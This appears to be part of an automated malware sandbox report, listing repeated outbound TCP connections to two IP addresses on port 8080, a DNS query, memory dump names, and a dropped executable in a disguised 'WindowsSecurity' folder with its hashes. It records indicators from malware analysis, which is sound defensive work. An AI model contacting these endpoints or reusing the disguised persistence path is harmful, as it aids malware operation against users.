FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
US 8.8.8.8:53 88.65.42.20.in-addr.arpa udp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp
FR 51.77.200.232:8080 51.77.200.232 tcp
FR 94.23.78.11:8080 94.23.78.11 tcp

Files

memory/2564-0-0x000001F6D2F90000-0x000001F6D2FF2000-memory.dmp

memory/2564-1-0x00007FFB09F90000-0x00007FFB0AA51000-memory.dmp

memory/2564-4-0x000001F6ED6E0000-0x000001F6ED6F0000-memory.dmp

memory/2564-6-0x00007FFB09F90000-0x00007FFB0AA51000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\a43b860d290321de53ed6deb5cae95af.exe.log

MD5 3308a84a40841fab7dfec198b3c31af7
SHA1 4e7ab6336c0538be5dd7da529c0265b3b6523083
SHA256 169bc31a8d1666535977ca170d246a463e6531bb21faab6c48cb4269d9d60b2e
SHA512 97521d5fb94efdc836ea2723098a1f26a7589a76af51358eee17292d29c9325baf53ad6b4496c5ca3e208d1c9b9ad6797a370e2ae378072fc68f5d6e8b73b198

C:\Users\Admin\AppData\Local\WindowsSecurity\a43b860d290321de53ed6deb5cae95af.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2520-11-0x00007FFB099F0000-0x00007FFB0A4B1000-memory.dmp

memory/2520-12-0x00000289F3580000-0x00000289F3590000-memory.dmp

memory/2520-15-0x00007FFB099F0000-0x00007FFB0A4B1000-memory.dmp

memory/2520-16-0x00000289F3580000-0x00000289F3590000-memory.dmp